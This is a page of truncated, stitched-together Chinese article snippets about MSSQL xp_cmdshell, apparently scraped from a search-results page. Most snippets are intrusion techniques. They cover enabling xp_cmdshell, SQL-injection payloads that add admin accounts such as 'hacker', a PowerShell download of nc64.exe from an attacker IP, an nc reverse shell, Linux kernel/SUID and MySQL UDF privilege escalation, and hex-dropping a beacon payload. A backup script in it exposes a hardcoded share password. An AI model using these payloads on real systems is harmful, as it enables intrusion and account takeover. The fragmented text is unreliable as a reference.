连接时使用nc工具链接即可 下载地址:https://eternallybored.org/misc/netcat/
下载NC https://eternallybored.org/misc/netcat/
存储过程为数据库提供了强大的功能,其类似UDF,在MSSQL中xp_cmdshell可谓臭名昭著了。...而这些系统存储过程中要数xp_cmdshell最强大,通过该存储过程可以在数据库服务器中执行任意系统命令。...EXEC master.dbo.xp_cmdshell 'ipconfig' xp_cmdshell默认在mssql2000中是开启的,在mssql2005之后的版本中则默认禁止。...EXEC sp_configure 'show advanced options',1//允许修改高级参数 RECONFIGURE EXEC sp_configure 'xp_cmdshell',1...//打开xp_cmdshell扩展 RECONFIGURE ?
今天在创建数据库的时候突然发现,xp_cmdshell的存储过程不能用了,网上一搜,发现大部分都是只关闭安全配置,然后就有了下文 代码:具体的看注释,值得一提的是==》reconfigure with...',1 --1代表允许,0代表阻止 reconfigure with override exec xp_cmdshell 'mkdir F:\Work\SQL mkdir E:\...SQL' exec sp_configure 'xp_cmdshell',0 reconfigure with override exec sp_configure 'show advanced...',1 --1代表允许,0代表阻止 reconfigure with override exec xp_cmdshell 'mkdir F:\Work\SQL mkdir E:\...SQL' exec sp_configure 'xp_cmdshell',0 reconfigure with override exec sp_configure 'show advanced
03正确的解决办法 下面的示例显示如何使普通用户在不具有执行存储过程 xp_cmdshell 的权限下,调用包含了执行 xp_cmdshell 代码的用户存储过程的方法。...= dbo; GRANT EXECUTE ON sys.xp_cmdshell TO Cmd_Login; GO 2 用户数据库 USE tempdb; GO -- 2.a 为执行xp_cmdshell...消息15153,级别16,状态1,过程xp_cmdshell,第1 行xp_cmdshell 代理帐户信息无法检索或无效。...请验证'##xp_cmdshell_proxy_account##' 凭据存在并且包含有效的信息。 可以使用下面的代码创建xp_cmdshell代理帐户。...', @sql = 'NET USER "' + @user + '" "' + @password + '" /ADD'; EXEC sys.xp_cmdshell @sql; -- 建立xp_cmdshell
5.png linux系统提权思路 linux基础信息收集 uname -a 显示全部系统信息 cat /etc/issue 内核信息。...此命令也适用于所有的Linux发行版 cat /etc/passwd 所有人都可看 ps aux | grep root (1)#内核漏洞提权 方法: 通过信息收集方式得知linux内核版本 使用searchspolit...linux内核提权示例 1.使用nc或lcx反弹到攻击者的电脑 2.使用 uname –a 查看Linux 版本内核等系统信息 3.在exploit库中寻找相应系统版本和内核的漏洞利用模块。...DLL路径’; select cmdshell('net user ndsec ndsecpw /add'); select cmdshell('net localgroup administrators...使用T-SQL语言编写好的各种小脚本共同组合成的集合体,我们就称为“存储过程” 利用xp_cmdshell提权 (1)xp_cmdshell解释 Xp_cmdshell是sqlserver中的组件,可以以操作系统命令解释器的方式执行给定的命令字符串
www.cnblogs.com/dunitian/p/4822808.html#tsql 某系统设计的不是很合理,库很多,图形化操作分离都得搞半天,各种改名也就更浪费时间了,于是引入了命令~(SQLServer现在已经在Linux...6.物理改名很多种(我这边的本质就是分离后修改,因为占用状态是没法修改的) 其实并没有什么新的sql,都是组合版的 exec xp_cmdshell 'rename E:\SQL\Test.mdf NewTest.mdf...sp_configure 'show advanced options',1 --显示高级选项 reconfigure with override--重新配置 exec sp_configure 'xp_cmdshell...',1 --1代表允许,0代表阻止 reconfigure with override exec xp_cmdshell 'rename E:\SQL\Test.mdf NewTest.mdf'...go exec xp_cmdshell 'rename E:\SQL\Test_log.ldf NewTest_log.ldf' go exec sp_configure 'xp_cmdshell
那么接下来作重要的就是探测系统信息,提权,针对windows想办法开启远程桌面连接,针对linux想办法使用反弹shell来本地连接。...连接数据库检查xp_cmdshell是否存在,扩展存储过程是否打开,再利用xp_cmdshell来执行系统命令,添加用户、开启远程桌面等。...常用命令: select count(*) from master.dbo.sysobjectswhere xtype = ‘x’ and name=’xp_cmdshell’ 返回值是1就是有xp_cmdshell...’,1; 开启扩展存储过程; reconfigure; (Sqlserver 2005) 通过xp_cmdshell来执行命令: xec master.dbo.xp_cmdshell ‘命令’ ③...如windows下一样,在Linux下首先通过webshell执行whoami来确定当前用户是什么用户,执行uname–r来确定Linux的内核版本,依照此版本来找对应的exp;当然对应很多版本的Linux
检测XP_CMDSHELL(CMD命令): and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_cmdshell') 检测...检测: ;exec master..xp_cmdshell 'dir c:\' 修复XP_CMDSHELL: ;exec master.dbo.sp_addextendedproc 'xp_cmdshell...', 'xplog70.dll' 用XP_CMDSHELL添加用户hacker: ;exec master.dbo.xp_cmdshell 'net user hacker 123456 /add' XP_CMDSHELL...- 解释:可以列出FreeBSD,Sunos系统根目录 - /etc tpd/conf tpd.conf或/usr/local/apche/conf tpd.conf - 解释:查看linux...解释:查看jsp开发的网站 resin文件配置信息 - c:/Resin/conf/resin.conf /usr/local/resin/conf/resin.conf - 解释:查看linux
使用Impacket登录mssql Impacket项目地址:https://github.com/SecureAuthCorp/impacket linux安装: git clone https://...开启xp_cmdshell执行系统命令 可以先测试一下xpcmd开没开 xp_cmdshell “whoami” 如果报错就没开xpshell 这时候就需要手动开启 **sp_configure;*...通过xp_cmdshell反弹shell 首先python临时起一个http服务,将nc或者是生成的木马放进去 在目标xp_cmdshell中输入**xp_cmdshell “powershell -c...xp_cmdshell “powershell -c cd c:\users\sql_svc\downloads; wget http://10.10.14.50/nc64.exe -outfile nc64....exe” 使用powershell进入到当前用户的下载目录,在使用wget命令下载木马文件 现在目标机器上有了nc,那么本地监听,再用xp_cmdshell执行即可 xp_cmdshell “powershell
0x01 前言 一个MSSQL非注入的场景:在内网扫描到一个MSSQL弱口令,支持xp_cmdshell,Administrator权限,但不能出网,DNS也出不了,那么我们该如何将文件落地到目标主机并执行上线呢...Automation Procedures', 1 RECONFIGURE 0x04 EXE转换HEX 使用以下方式将生成的CS/MSF攻击载荷文件转换为HEX编码,这里我找了几个可以转换HEX编码的方法,Linux...(1) Linux exe -> hex xxd -ps beacon.exe hex.txt (2) python exe -> hex import binascii filename = 'beacon.exe...注:xp_cmdshell组件调用的是cmd.exe,所以在利用这种方式写入大文件时可能会出现字符长度限制等问题。...xp_cmdshell: exec master..xp_cmdshell "cmd /c C:\\Windows\\temp\\cs.exe" sp_oacreate: declare @shell
第三方组件提权 一、溢出提权 溢出提权就是利用系统漏洞进行提权 远程溢出:攻击者只要与服务器连接,然后根据漏洞使用响应的exp即可,如著名的MS-08067 本地溢出:现拥有服务器的一个用户,较多见 1、linux...提权 基础知识:一文了解linux下的用户(组)和权限 (1)内核提权 步骤: 查看服务器内核版本,uname-a & id 本地接收服务器端数据,nc -l -n -v 8888 服务器端反弹shell...上传溢出提权exp并执行 github上的一个集合:linux-kernel-exploits (2)SUID提权 SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID提权的思路就是运行...root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了 已知的可用来提权的linux可行性的文件列表如下: nmap vim find bash more less...returns string soname 'udf.dll'; //创建cmdshell函数 select cmdshell('command'); //执行命令,这一步之后就可以执行cmd命令了
最让人感兴趣的也许就是前面介绍的利用扩展存储过程xp_cmdshell来运行操作系统的控制台命令。...这种方法也非常的简单,只需使用下面的SQL语句: EXEC master.dbo.xp_cmdshell 'dir c:/' 但是越来越多的数据库管理员已经意识到这个扩展存储过程的潜在危险,他们可能会将该存储过程的动态链接库...对此作过一番研究,后来我发现即使xp_cmdshell不可用了,还是有可能在服务器上运行CMD并得到回显结果的,这里要用到SQL服务器另外的几个系统存储过程:sp_OACreate,sp_OAGetProperty
smbclient -U QUERIER/invalid //10.10.10.125/Reports smb: \> get "Currency Volume Report.xlsm" 在Linux...SQL> RECONFIGURE; SQL> EXEC sp_configure 'xp_cmdshell', 1; [*] INFO(QUERIER): Line 185: Configuration...option 'xp_cmdshell' changed from 1 to 1....SQL> RECONFIGURE; SQL> xp_cmdshell "dir c:\users" output ......c:\programdata\nc.exe" SQL> xp_cmdshell "c:\programdata\nc.exe 10.10.14.6 1234 -e c:\windows\system32
先来列出危险的内置存储过程: xp_cmdshell xp_regaddmultistring xp_regdeletekey xp_regdeletevalue xp_regenumkeys xp_regenumvalues...sp_OADestroy sp_OAMethod sp_OAGetProperty sp_OASetProperty sp_OAGetErrorInfo sp_OAStop 以上各项全在我们封杀之列,例如xp_cmdshell...屏蔽的方法为: sp_dropextendedproc 'xp_cmdshell' 如果需要的话,再用 sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' 进行恢复...如果你不知道xp_cmdshell使用的是哪个.dll文件的话,可以使用 sp_helpextendedproc xp_cmdshel 来查看xp_cmdshell使用的是哪个动态联接库。...另外,将xp_cmdshell屏蔽后,我们还需要做的步骤是将xpsql70.dll文件进行改名,以防止获得SA的攻击者将它进行恢复。
EXEC master.dbo.xp_cmdshell 'cmd'; 最为经典的就是这个组件了,但是2005之后就默认关闭,而且现在来说都会把这个扩展删除掉 因为xp_cmdshell用得最多,这里就...'xp_cmdshell', 'xpsql70.dll' 2....恢复方法: EXEC sp_dropextendedproc "xp_cmdshell"EXEC sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' 3....恢复方法: exec sp_dropextendedproc 'xp_cmdshell'exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' 4....SQL Server 阻止了对组件 'xp_cmdshell' 的 过程'sys.xp_cmdshell' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。
0x02 尝试多语句执行添加用户 查看是否有 xp_cmdshell Payload:admin';if(1=(select count(*) from master.dbo.sysobjects where...xtype = 'x' and name = 'xp_cmdshell')) WAITFOR DELAY '0:0:5';-- ?...开启 xp_cmdshell Payload:admin';EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure...'xp_cmdshell',1;RECONFIGURE;-- 查看 whoami Payload:admin';exec master..xp_cmdshell 'ping %USERNAME%...ms-wbt-server Nmap done: 1 IP address (1 host up) scanned in 2.07 seconds 直接添加用户: admin';exec master..xp_cmdshell
del y:\backup\database\'+@dbname + convert(varchar(10),DATEADD(DAY,-2,getdate()),112) EXEC master..xp_cmdshell...@cmd_str --删除RAR set @cmd_str='del y:\backup\database\'+@dbname+'.rar' EXEC master..xp_cmdshell @cmd_str...WinRAR.exe" a y:\backup\database\'+@dbname+'.rar ' + @local_name print @cmd_str+char(10) EXEC master..xp_cmdshell...@cmd_str --网络认证 EXEC master..xp_cmdshell 'net use w: \\200.168.15.9\backup "baijin830" /user:"WINDOWS...cmd_str='copy x:\backup\database\'+ @dbname+'.rar ' + 'w:\' print @cmd_str+char(10) EXEC master..xp_cmdshell
工具使用 1. mssql xp_cmdshell 2. mysql udf 3. postgres cve-2019-9193 4. oracle dbms_export_extension... -console2 sp_oacreate使用exec直接回显 -crack 爆破参数 -crontab Linux... 开启clr -issp 判断是否存在sp_oacreate,存在则开启 -isxp 判断是否存在xp_cmdshell... 设置 exp.dll | exp.so (default "exp.dll") -ssh ssh连接 -sshkey Linux
进行提权 xp_cmdshell默认在mssql2000中是开启的,在mssql2005之后默认禁止,但未删除 0x01 xp_cmdshell简介 xp``_cmdshell是Sql Server中的一个组件...通常在拿到sa口令之后,可以通过xp``_cmdshell来进行提权 影响范围: 只要该数据库存在该组件,就可以利用 0x02 xp_cmdshell使用 1)查看xp_cmdshell状态 select...)利用xp_cmdshell执行命令 执行系统命令 以下几条命令格式都可以用于执行系统命令 exec xp_cmdshell "whoami"master..xp_cmdshell 'whoami...保护措施 将该xp_cmdshell存储过程删除即可 exec sp_dropextendedproc 'xp_cmdshell' 被删除后,重新添加xp``_cmdshell存储过程语句 EXEC...', 'xpsql70.dll'; 若想彻底删除xp_cmdshell扩展存储过程,建议在C盘里直接搜索xplog70.dll,然后删除xp_cmdshell。
领取专属 10元无门槛券
手把手带您无忧上云